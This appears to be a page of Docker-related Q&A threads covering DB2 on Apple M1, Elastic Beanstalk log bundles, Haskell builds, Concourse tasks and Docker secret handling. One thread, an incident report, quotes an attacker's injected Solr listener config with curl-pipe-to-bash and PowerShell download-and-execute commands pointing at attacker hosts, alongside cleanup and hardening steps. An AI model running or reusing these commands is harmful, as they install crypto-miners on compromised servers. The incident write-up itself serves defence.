ibmcom/db2 docker image fails on m1 - linux

I'm having trouble setting up DB2 on macOS via Docker on my M1 Max MacBook Pro (32 GB RAM). I already had a look at this question, which might be related, but it contains little information and I cannot say for sure whether it is about the exact same thing.
I set up the following docker-compose.yml:
version: '3.8'
services:
  db2:
    image: ibmcom/db2
    platform: linux/amd64
    container_name: db2-test
    privileged: true
    environment:
      LICENSE: "accept"
      DB2INSTANCE: "db2dude"
      DB2INST1_PASSWORD: "db2pw"
      DBNAME: "RC1DBA"
      BLU: "false"
      ENABLE_ORACLE_COMPATIBILITY: "false"
      UPDATEVAIL: "NO"
      TO_CREATE_SAMPLEDB: "false"
      REPODB: "false"
      IS_OSXFS: "true"
      PERSISTENT_HOME: "true"
      HADR_ENABLED: "false"
      ETCD_ENDPOINT: ""
      ETCD_USERNAME: ""
      ETCD_PASSWORD: ""
    volumes:
      - ~/workspace/docker/db2-error/db2/database:/database
      - ~/workspace/docker/db2-error/db2/db2_data:/db2_data
    ports:
      - 50000:50000
On my Intel MacBook this spins up without any issue; on my M1 MacBook, however, I see the following portion of STDOUT after Task #4 finishes:
DBI1446I The db2icrt command is running.
DBI1070I Program db2icrt completed successfully.
(*) Fixing /etc/services file for DB2 ...
/bin/bash: db2stop: command not found
From what I could figure out, the presence of (*) Fixing /etc/services file for DB2 ... already seems to be wrong (it does not appear in my Intel log and does not sound like everything's fine), and the /bin/bash: db2stop: command not found appears due to line 81 of /var/db2_setup/include/db2_common_functions, which states su - ${DB2INSTANCE?} -c 'db2stop force'.
As far as I understand, su - should run with the PATH of the target user, and every single .profile or .bashrc in the home directory sources ~/sqllib/db2profile (via . /database/config/db2dude/sqllib/db2profile).
However, when I am root inside the container (docker exec -it db2-test bash) and call su - db2dude -c 'echo $PATH', it prints /usr/local/bin:/bin:/usr/bin. The PATH is therefore obviously not as expected.
Maybe someone can figure out what's happening at this point. I also tried running Docker with the new virtualization framework, which did not change anything. I assume Docker's compatibility magic might not be perfect, but I'm hoping to find some kind of workaround, maybe by building an image on top of ibmcom/db2.
I highly appreciate your time and advice. Thanks a lot in advance.

As stated in mshabou's answer, there is no support yet. One way you can still make it work is by prepending your Docker command with DOCKER_DEFAULT_PLATFORM=linux/amd64, or by executing export DOCKER_DEFAULT_PLATFORM=linux/amd64 in your shell before starting the container.
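For example (a minimal sketch, assuming the docker-compose.yml above sits in the current directory):

# one-off: force amd64 emulation for this invocation only
DOCKER_DEFAULT_PLATFORM=linux/amd64 docker compose up -d

# or set it for the whole shell session
export DOCKER_DEFAULT_PLATFORM=linux/amd64
docker compose up -d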
Alternatively, you can use colima. Install colima as described on their GitHub page and then start it in emulated mode with colima start --arch x86_64. You will then be able to use your ibmcom/db2 image the way you're used to (albeit with decreased performance).
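A minimal sketch (assuming you install colima via Homebrew, which its README offers as one option):

brew install colima          # assumption: installation via Homebrew
colima start --arch x86_64   # start an emulated x86_64 VM
docker compose up -d         # the docker CLI now talks to colima's VM via its docker context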

Db2 is not supported on the ARM architecture; only these architectures are supported: amd64, ppc64le, s390x
https://hub.docker.com/r/ibmcom/db2

Related

Elastic Beanstalk: log task customization on Amazon Linux 2 platforms

I'm wondering how to do log task customization in the new Elastic Beanstalk platform (the one based on Amazon Linux 2). Specifically, I'm comparing:
Old: Single-container Docker running on 64bit Amazon Linux/2.14.3
New: Single-container Docker running on 64bit Amazon Linux 2/3.0.0
(My question actually has nothing to do with Docker as such; I suspect the problem exists for any of the new Elastic Beanstalk platforms.)
Previously I could follow Amazon's recipe, meaning put a file into /opt/elasticbeanstalk/tasks/bundlelogs.d/ and it would then be acted upon. This is no longer true.
Has this changed? I can't find it documented. Anyone been successful in doing log task customization on the newer Elastic Beanstalk platform? If so, how?
Minimal working example
I've created a minimal working example and deployed on both platforms.
Dockerfile:
FROM ubuntu
COPY daemon-run.sh /daemon-run.sh
RUN chmod +x /daemon-run.sh
EXPOSE 80
ENTRYPOINT ["/daemon-run.sh"]
Dockerrun.aws.json:
{
  "AWSEBDockerrunVersion": "1",
  "Logging": "/var/mydaemon"
}
daemon-run.sh:
#!/bin/bash
echo "Starting daemon" # output to stdout
mkdir -p /var/mydaemon/deeperlogs
while true; do
  echo "$(date '+%Y-%m-%dT%H:%M:%S%:z') Hello World" >> /var/mydaemon/deeperlogs/app_$$.log
  sleep 5
done
.ebextensions/mydaemon-logfiles.config:
files:
  "/opt/elasticbeanstalk/tasks/bundlelogs.d/mydaemon-logs.conf":
    mode: "000755"
    owner: root
    group: root
    content: |
      /var/log/eb-docker/containers/eb-current-app/deeperlogs/*.log
If I do "Full Logs" action on the old platform I would get a ZIP with my deeperlogs included
inside var/log/eb-docker/containers/eb-current-app. On the new platform I don't.
Investigation
If you look on the disk you'll see that the new Elastic Beanstalk doesn't have a /opt/elasticbeanstalk/tasks folder at all, unlike the old one. Hmm.
On Amazon Linux 2 the folder is:
/opt/elasticbeanstalk/config/private/logtasks/bundle
The .ebextensions/mydaemon-logfiles.config should be:
files:
  "/opt/elasticbeanstalk/config/private/logtasks/bundle/mydaemon-logs.conf":
    mode: "000644"
    owner: root
    group: root
    content: |
      /var/mydaemon/deeperlogs/*.log

container_commands:
  append_deeperlogs_to_applogs:
    command: echo -e "\n/var/log/eb-docker/containers/eb-current-app/deeperlogs/*" >> /opt/elasticbeanstalk/config/private/logtasks/bundle/applogs
The mydaemon-logfiles.config also adds deeperlogs to the applogs file. Without this, deeperlogs will not be included in the downloaded log zip bundle. This is interesting, because the folder is in the correct location, i.e., /var/log/eb-docker/containers/eb-current-app/deeperlogs/, but without being explicitly listed in applogs it is skipped when the zip bundle is generated.
I tested it with a single-docker environment (3.0.1).
The full log bundle successfully contained deeperlogs with the correct log data.
Hope that this will help. I haven't found any references for this; the AWS documentation does not cover it, as it is mostly based on Amazon Linux 1, not Amazon Linux 2.
Amazon has fixed this problem in the versions of the Elastic Beanstalk AL2 platforms released on 04-AUG-2020.
Log task customization on AL2-based platforms now works the way it has always worked (i.e. on the previous-generation AL2018 platforms), and you can therefore follow the official documentation to make this happen.
Successfully tested with platform "Docker running on 64bit Amazon Linux 2/3.1.0". If you (still) use "Docker running on 64bit Amazon Linux 2/3.0.x" then you must use the undocumented workaround described in Marcin's answer, but you are probably better off upgrading your platform version.
As of 2021/11/05, I tried the accepted answer and various other examples, including the latest official documentation on using the .ebextensions folder with *.config files, without success.
Most likely it was something I was doing wrong, but here's what worked for me.
The version I'm using: Docker running on 64bit Amazon Linux 2/3.4.8
Simply, add a volume to your docker-compose.yml file to share your application logs to the Elastic Beanstalk log directory.
Example docker-compose.yml:
version: "3.9"
services:
app:
build: .
ports:
- "80:80"
user: root
volumes:
- ./:/var/www/html
# "${EB_LOG_BASE_DIR}/<service name>:<log directory inside container>
- "${EB_LOG_BASE_DIR}/app:/var/www/html/application/logs" # ADD THIS LINE
env_file:
- .env
For more info, here's the documentation I followed.
Hopefully, this helps future readers like myself 👍

SolrException: Error loading class 'solr.RunExecutableListener' + '/var/tmp/sustes' process

Prehistory:
My friend's site started to work slowly.
This site uses Docker.
htop told me that all cores were loaded at 100% by the process /var/tmp/sustes running as user 8983. I tried to find out what sustes is, but Google did not help; the UID 8983, however, points at the Solr container (it is the user the official Solr image runs as).
Tried to update Solr from v6.? to 7.4 and got the message:
o.a.s.c.SolrCore Error while closing
...
Caused by: org.apache.solr.common.SolrException: Error loading class
'solr.RunExecutableListener'
Rolled back to v6.6.4 (the only v6 still available on Docker Hub, https://hub.docker.com/_/solr/), as the site should continue working.
In Docker's logs I found:
[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persisted to File System [{"update-listener":{
  "exe":"sh",
  "name":"newlistener-02",
  "args":[
    "-c",
    "curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
  "event":"newSearcher",
  "class":"solr.RunExecutableListener",
  "dir":"/bin/"}}]
So at http://192.99.142.226:8220/mr.sh we can find the malware code, which installs a crypto miner (crypto miner config: http://192.99.142.226:8220/wt.conf).
Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can see the full config, but right now we just need the listener section:
"listener":[{
"event":"newSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"event":"firstSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"exe":"sh",
"name":"newlistener-02",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"sh",
"name":"newlistener-25",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"cmd.exe",
"name":"newlistener-00",
"args":["/c",
"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"cmd.exe"}],
As we do not have such settings in solrconfig.xml, I found them in /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the settings of this file can be seen at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay).
Fixing:
Clean configoverlay.json, or simply remove the file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).
Restart Solr (how to start/stop: https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart the docker container.
As I understand, this attack is possible due to CVE-2017-12629:
How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc
... and was fixed in v5.5.5, 6.6.2+ and 7.1+.
The attack was possible because http://example.com:8983 was freely accessible to anyone, so even though this exploit is fixed, let's...
Add protection to http://example.com:8983
Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin
Create security.json with:
{
  "authentication":{
    "blockUnknown": true,
    "class":"solr.BasicAuthPlugin",
    "credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}
  },
  "authorization":{
    "class":"solr.RuleBasedAuthorizationPlugin",
    "permissions":[{"name":"security-edit",
      "role":"admin"}],
    "user-role":{"solr":"admin"}
  }
}
This file must be dropped into /opt/solr/server/solr/ (i.e. next to solr.xml).
As Solr has its own hash checker (a sha256(password+salt) hash), a typical solution cannot be used here. The easiest way to generate the hash that I've found is to download the jar file from http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.
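If you would rather not download a jar, a rough shell sketch of the same computation follows; it assumes (based on Solr's Sha256AuthenticationProvider) that the stored credential is base64(sha256(sha256(salt+password))) followed by a space and base64(salt):

# hedged sketch: recompute Solr's basic-auth hash with openssl
password='NewPassword'
salt_b64=$(openssl rand -base64 32)                        # 32 random salt bytes
hash_b64=$( { echo "$salt_b64" | openssl base64 -d; printf '%s' "$password"; } \
  | openssl dgst -sha256 -binary \
  | openssl dgst -sha256 -binary \
  | openssl base64 )
echo "\"solr\":\"$hash_b64 $salt_b64\""                    # value for security.json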
Because I use docker-compose, I simply build Solr like this:
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/
# project/sources/docker-compose.yml (just the Solr part)
solr:
  build: ./dockerfiles/solr/
  container_name: solr-container
  # Check if the 'default' core is created. If not, create it.
  entrypoint:
    - docker-entrypoint.sh
    - solr-precreate
    - default
  # Access to the web interface from host to container, i.e. 127.0.0.1:8983
  ports:
    - "8983:8983"
  volumes:
    - ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default # configs
    - ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data # indexes

How do I run Linux tasks without Docker (on the underlying system)?

A task's image_resource property is marked as optional in the documentation, but GNU/Linux tasks fail without it.
Also, the docs for the type property of image_resource say:
Required. The type of the resource. Usually docker-image
But I couldn't find any information about other supported types.
How can I run tasks on the underlying system without any container technology, like in my Windows and macOS workers?
In Concourse, you really are not supposed to do anything outside of Docker. That is one of the main features: Concourse runs in Docker containers and starts new containers for each build. If you want to run one or more Linux commands in sh or bash in the container, you can try something like the task config below.
- task: linux
  config:
    platform: linux
    image_resource:
      type: docker-image
      source: {repository: ubuntu, tag: '18.04'}
    run:
      dir: /<path-to-dir>
      path: sh
      user: root
      args:
        - -exc
        - |
          echo "Running in Linux!"
          ls
          scp <you#your-host-machine:file> .
          telnet <your-host-machine>
          <whatever>
          ...

Haskell installation in docker container using stack failing: too many open files

I have a simple Dockerfile
FROM haskell:8
WORKDIR "/root"
CMD ["/bin/bash"]
which I run with my pwd folder mounted to "/root". In my current folder I have a Haskell project that uses stack (funblog). I configured stack.yaml to use the "lts-7.20" resolver, which aims to install ghc-8.0.1.
Inside the container, after running "stack update", I ran "stack setup", but I am getting "Too many open files in system" during the GHC compilation.
This is my stack.yaml
flags: {}
packages:
- '.'
- location:
    git: https://github.com/agrafix/Spock.git
    commit: 2c60a48b2c0be0768071cc1b3c7f14590ffcc7d6
  subdirs:
  - Spock
  - Spock-core
  - reroute
- location:
    git: https://github.com/agrafix/Spock-digestive.git
    commit: 4c85647427e21bbaefbf04c4bc315d4bdfabba0e
extra-deps:
- digestive-bootstrap-0.1.0.1
- blaze-bootstrap-0.1.0.1
- digestive-functors-blaze-0.6.0.6
resolver: lts-7.20
One important note: I don't want to use Docker to deploy the app, just to compile it, i.e. as part of my dev process.
Any ideas?
Should I use another image without ghc pre-installed to use with docker? Which one?
update
Yes, I could use the GHC built into the container, and it is a good idea, but I wondered whether there is any issue building GHC within Docker.
update 2
For anyone wishing to reproduce (on macOS, by the way): you can clone the repo https://github.com/carlosayam/funblog and grab commit 9446bc0e52574cc574a9eb5f2733f69e07b874ef
(I will probably move on using container's GHC)
By default, Docker for macOS limits the number of file descriptors to avoid hitting macOS system-wide limits (the default limit is 900). To increase the limit, run the following commands:
$ cd ~/Library/Containers/com.docker.docker/Data/database/
$ git reset --hard
HEAD is now at 9410b78 last-start-time changed at 1480947038
$ cat com.docker.driver.amd64-linux/slirp/max-connections
900
$ echo 1200 > com.docker.driver.amd64-linux/slirp/max-connections
$ git add com.docker.driver.amd64-linux/slirp/max-connections
$ git commit -s -m 'Update the maximum number of connections'
[master 227a248] Update the maximum number of connections
1 file changed, 1 insertion(+), 1 deletion(-)
Then check the notice messages by:
$ syslog -k Sender Docker
<Notice>: updating connection limit to 1200
To check how many files you got open, run: sysctl kern.num_files.
To check what's your current limit, run: sysctl kern.maxfiles.
To increase it system-wide, run: sysctl -w kern.maxfiles=20480.
Source: Containers become unresponsive due to "too many connections".
See also: Docker: How to increase number of open files limit.
On Linux, you can also try to run Docker with --ulimit, e.g.
docker run --ulimit nofile=5000:5000 <image-tag>
Source: Docker error: too many open files

Docker and securing passwords

I've been experimenting with Docker recently, building some services to play around with, and one thing that keeps nagging me is putting passwords in a Dockerfile. I'm a developer, so storing passwords in source feels like a punch in the face. Should this even be a concern? Are there any good conventions on how to handle passwords in Dockerfiles?
Definitely it is a concern. Dockerfiles are commonly checked into repositories and shared with other people. An alternative is to provide any credentials (usernames, passwords, tokens, anything sensitive) as environment variables at runtime. This is possible via the -e argument (for individual vars on the CLI) or the --env-file argument (for multiple variables in a file) to docker run. Read this for using environment variables with docker-compose.
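For example (a sketch; the variable names and image are made up):

# pass individual variables on the CLI
docker run -e DB_USER=myuser -e DB_PASSWORD=s3cret myimage

# or collect them in a file that stays out of version control
docker run --env-file ./app.env myimage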
Using --env-file is definitely a safer option since this protects against the secrets showing up in ps or in logs if one uses set -x.
However, env vars are not particularly secure either. They are visible via docker inspect, and hence they are available to any user that can run docker commands. (Of course, any user that has access to docker on the host also has root anyway.)
My preferred pattern is to use a wrapper script as the ENTRYPOINT or CMD. The wrapper script can first import secrets from an outside location in to the container at run time, then execute the application, providing the secrets. The exact mechanics of this vary based on your run time environment. In AWS, you can use a combination of IAM roles, the Key Management Service, and S3 to store encrypted secrets in an S3 bucket. Something like HashiCorp Vault or credstash is another option.
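A minimal sketch of that wrapper pattern (fetch-secret is a placeholder for whatever your environment provides, e.g. an aws s3 cp or a vault read):

#!/bin/sh
# entrypoint.sh -- sketch of a secret-fetching wrapper
set -e
DB_PASSWORD=$(fetch-secret db/password)  # hypothetical helper; swap in your store's CLI
export DB_PASSWORD
exec "$@"                                # hand off to the application as PID 1

In the Dockerfile you would then set ENTRYPOINT ["/entrypoint.sh"] and keep the application command as CMD, so the wrapper runs first on every start.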
AFAIK there is no optimal pattern for using sensitive data as part of the build process. In fact, I have an SO question on this topic. You can use docker-squash to remove layers from an image. But there's no native functionality in Docker for this purpose.
You may find shykes' comments on config in containers useful.
Our team avoids putting credentials in repositories, so that means they're not allowed in Dockerfile. Our best practice within applications is to use creds from environment variables.
We solve for this using docker-compose.
Within docker-compose.yml, you can specify a file that contains the environment variables for the container:
env_file:
  - .env
Make sure to add .env to .gitignore, then set the credentials within the .env file like:
SOME_USERNAME=myUser
SOME_PWD_VAR=myPwd
Store the .env file locally or in a secure location where the rest of the team can grab it.
See: https://docs.docker.com/compose/environment-variables/#/the-env-file
Docker now (version 1.13 or 17.06 and higher) has support for managing secret information. Here's an overview and more detailed documentation
A similar feature exists in Kubernetes and DC/OS.
You should never add credentials to a container unless you're OK with broadcasting the creds to whoever can download the image. In particular, doing an ADD creds and a later RUN rm creds is not secure, because the creds file remains in the final image in an intermediate filesystem layer. It's easy for anyone with access to the image to extract it.
The typical solution I've seen, when you need creds to check out dependencies and such, is to use one container to build another. I.e., typically you have some build environment in your base container and you need to invoke that to build your app container. The simple approach of adding your app source and then RUNning the build commands is insecure if you need creds in that RUN. Instead, put your source into a local directory, run (as in docker run) the container to perform the build step with the local source directory mounted as a volume and the creds either injected or mounted as another volume. Once the build step is complete, you build your final container by simply ADDing the local source directory, which now contains the built artifacts; a rough sketch follows.
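A sketch of that flow (image names, paths and the build command are all made up):

# 1. run the build step in a throwaway builder container; source and creds
#    are mounted as volumes, so they never end up in an image layer
docker run --rm \
  -v "$PWD/src:/workspace" \
  -v "$HOME/.build-creds:/root/.build-creds:ro" \
  my-build-env sh -c 'cd /workspace && make build'

# 2. the final image only ADDs the built artifacts -- no creds involved
docker build -t my-app ./src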
I'm hoping Docker adds some features to simplify all this!
Update: it looks like the method going forward will be nested builds. In short, the Dockerfile would describe a first container that is used to build the run-time environment, and then a second, nested container build that assembles all the pieces into the final container. This way the build-time stuff isn't in the second container. Think of a Java app where you need the JDK for building but only the JRE for running. There are a number of proposals being discussed; it's best to start from https://github.com/docker/docker/issues/7115 and follow some of the links for alternate proposals.
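This idea later shipped as multi-stage builds. A hedged sketch of the Java case (base images and paths are illustrative, not from the proposals above):

# stage 1: build with the full JDK; build tooling stays in this stage only
FROM eclipse-temurin:17-jdk AS build
WORKDIR /src
COPY . .
RUN ./gradlew build

# stage 2: run with just the JRE; only the artifact is copied across
FROM eclipse-temurin:17-jre
COPY --from=build /src/build/libs/app.jar /app.jar
ENTRYPOINT ["java", "-jar", "/app.jar"]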
An alternative to using environment variables, which can get messy if you have a lot of them, is to use volumes to make a directory on the host accessible in the container.
If you put all your credentials as files in that folder, then the container can read the files and use them as it pleases.
For example:
$ echo "secret" > /root/configs/password.txt
$ docker run -v /root/configs:/cfg ...
In the Docker container:
# echo Password is `cat /cfg/password.txt`
Password is secret
Many programs can read their credentials from a separate file, so this way you can just point the program to one of the files.
run-time only solution
docker-compose also provides a non-swarm-mode solution (since v1.11: Secrets using bind mounts).
The secrets are mounted as files below /run/secrets/ by docker-compose. This solves the problem at run-time (running the container), but not at build-time (building the image), because /run/secrets/ is not mounted at build-time. Furthermore this behavior depends on running the container with docker-compose.
Example:
Dockerfile
FROM alpine
CMD cat /run/secrets/password
docker-compose.yml
version: '3.1'
services:
  app:
    build: .
    secrets:
      - password
secrets:
  password:
    file: password.txt
To build, execute:
docker-compose up -d
Further reading:
mikesir87's blog - Using Docker Secrets during Development
My approach seems to work, but is probably naive. Tell me why it is wrong.
ARGs set during docker build are exposed by the history subcommand, so no go there. However, when running a container, environment variables given in the run command are available to the container but are not part of the image.
So, in the Dockerfile, do the setup that does not involve secret data and set a CMD of something like /root/finish.sh. In the run command, use environment variables to send secret data into the container. finish.sh uses the variables, essentially, to finish the build tasks.
To make managing the secret data easier, put it into a file that is loaded by docker run with the --env-file switch. Of course, keep the file secret. .gitignore and such.
For me, finish.sh runs a Python program. It checks to make sure it hasn't run before, then finishes the setup (e.g., copies the database name into Django's settings.py).
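A sketch of that pattern (file and variable names are made up; the settings step mirrors the Django example above). The container is started with the secrets file, and finish.sh consumes the variables:

docker run --env-file ./secrets.env myimage

#!/bin/sh
# /root/finish.sh -- set as the CMD in the Dockerfile
if [ ! -f /root/.finished ]; then                  # check it hasn't run before
  echo "DB_NAME = '$DB_NAME'" >> /app/settings.py  # hypothetical finishing step
  touch /root/.finished
fi
exec /usr/local/bin/myapp                          # then start the app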
There is a new docker command for "secrets" management, but it only works for swarm clusters.
docker service create \
  --name my-iis \
  --publish target=8000,port=8000 \
  --secret src=homepage,target="\inetpub\wwwroot\index.html" \
  microsoft/iis:nanoserver
The issue 13490 "Secrets: write-up best practices, do's and don'ts, roadmap" just got a new update in Sept. 2020, from Sebastiaan van Stijn:
Build time secrets are now possible when using buildkit as builder; see the blog post "Build secrets and SSH forwarding in Docker 18.09", Nov. 2018, from Tõnis Tiigi.
The documentation is updated: "Build images with BuildKit"
The RUN --mount option used for secrets will graduate to the default (stable) Dockerfile syntax soon.
That last part is new (Sept. 2020)
New Docker Build secret information
The new --secret flag for docker build allows the user to pass secret information to be used in the Dockerfile for building docker images in a safe way that will not end up stored in the final image.
id is the identifier to pass into the docker build --secret.
This identifier is associated with the RUN --mount identifier to use in the Dockerfile.
Docker does not use the filename of where the secret is kept outside of the Dockerfile, since this may be sensitive information.
dst renames the secret file to a specific file in the Dockerfile RUN command to use.
For example, with a secret piece of information stored in a text file:
$ echo 'WARMACHINEROX' > mysecret.txt
And with a Dockerfile that specifies use of a BuildKit frontend docker/dockerfile:1.0-experimental, the secret can be accessed.
For example:
# syntax = docker/dockerfile:1.0-experimental
FROM alpine
# shows secret from default secret location:
RUN --mount=type=secret,id=mysecret cat /run/secrets/mysecret
# shows secret from custom secret location:
RUN --mount=type=secret,id=mysecret,dst=/foobar cat /foobar
This Dockerfile is only meant to demonstrate that the secret can be accessed. As you can see, the secret is printed in the build output. The final image built will not contain the secret file:
$ docker build --no-cache --progress=plain --secret id=mysecret,src=mysecret.txt .
...
#8 [2/3] RUN --mount=type=secret,id=mysecret cat /run/secrets/mysecret
#8 digest: sha256:5d8cbaeb66183993700828632bfbde246cae8feded11aad40e524f54ce7438d6
#8 name: "[2/3] RUN --mount=type=secret,id=mysecret cat /run/secrets/mysecret"
#8 started: 2018-08-31 21:03:30.703550864 +0000 UTC
#8 1.081 WARMACHINEROX
#8 completed: 2018-08-31 21:03:32.051053831 +0000 UTC
#8 duration: 1.347502967s
#9 [3/3] RUN --mount=type=secret,id=mysecret,dst=/foobar cat /foobar
#9 digest: sha256:6c7ebda4599ec6acb40358017e51ccb4c5471dc434573b9b7188143757459efa
#9 name: "[3/3] RUN --mount=type=secret,id=mysecret,dst=/foobar cat /foobar"
#9 started: 2018-08-31 21:03:32.052880985 +0000 UTC
#9 1.216 WARMACHINEROX
#9 completed: 2018-08-31 21:03:33.523282118 +0000 UTC
#9 duration: 1.470401133s
...
The 12-Factor app methodology says that any configuration should be stored in environment variables.
Docker Compose can do variable substitution in the configuration, so that can be used to pass passwords from the host to docker.
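A small sketch of that substitution (service and variable names are made up); Compose fills in ${DB_PASSWORD} from the shell environment when you run docker-compose up:

# docker-compose.yml
services:
  db:
    image: postgres
    environment:
      POSTGRES_PASSWORD: "${DB_PASSWORD}"  # substituted from the host shell

# usage:
DB_PASSWORD=s3cret docker-compose up -d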
Starting from Version 20.10, besides using secret-file, you could also provide secrets directly with env.
buildkit: secrets: allow providing secrets with env moby/moby#41234 docker/cli#2656 moby/buildkit#1534
Support --secret id=foo,env=MY_ENV as an alternative for storing a secret value to a file.
--secret id=GIT_AUTH_TOKEN will load env if it exists and the file does not.
secret-file:
THIS IS SECRET
Dockerfile:
# syntax = docker/dockerfile:1.3
FROM python:3.8-slim-buster
COPY build-script.sh .
RUN --mount=type=secret,id=mysecret ./build-script.sh
build-script.sh:
cat /run/secrets/mysecret
Execution:
$ export MYSECRET=theverysecretpassword
$ export DOCKER_BUILDKIT=1
$ docker build --progress=plain --secret id=mysecret,env=MYSECRET -t abc:1 . --no-cache
......
#9 [stage-0 3/3] RUN --mount=type=secret,id=mysecret ./build-script.sh
#9 sha256:e32137e3eeb0fe2e4b515862f4cd6df4b73019567ae0f49eb5896a10e3f7c94e
#9 0.931 theverysecretpassword#9 DONE 1.5s
......
With Docker v1.9 you can use the ARG instruction to fetch arguments passed on the command line to the image at build time. Simply use the --build-arg flag. That way you can avoid keeping explicit passwords (or other sensitive information) in the Dockerfile and pass them in on the fly.
source: https://docs.docker.com/engine/reference/commandline/build/ http://docs.docker.com/engine/reference/builder/#arg
Example:
Dockerfile
FROM busybox
ARG user
RUN echo "user is $user"
build image command
docker build --build-arg user=capuccino -t test_arguments -f path/to/dockerfile .
during the build it prints:
$ docker build --build-arg user=capuccino -t test_arguments -f ./test_args.Dockerfile .
Sending build context to Docker daemon 2.048 kB
Step 1 : FROM busybox
---> c51f86c28340
Step 2 : ARG user
---> Running in 43a4aa0e421d
---> f0359070fc8f
Removing intermediate container 43a4aa0e421d
Step 3 : RUN echo "user is $user"
---> Running in 4360fb10d46a
**user is capuccino**
---> 1408147c1cb9
Removing intermediate container 4360fb10d46a
Successfully built 1408147c1cb9
Hope it helps! Bye.
Something simple like this will work, I guess, if it is a bash shell.
read -sp "db_password: " db_password
docker build --build-arg mysql_db_password="$db_password" -t <image_name> .
Simply read it silently and pass it as a build argument. You need to accept the variable as ARG in the Dockerfile.
While I totally agree there is no simple solution, there continues to be a single point of failure: either the Dockerfile, etcd, and so on. Apcera has a plan that looks like sidekick dual authentication: in other words, two containers cannot talk unless there is an Apcera configuration rule. In their demo the uid/pwd was in the clear and could not be reused until the admin configured the linkage. For this to work, however, it probably means patching Docker or at least the network plugin (if there is such a thing).
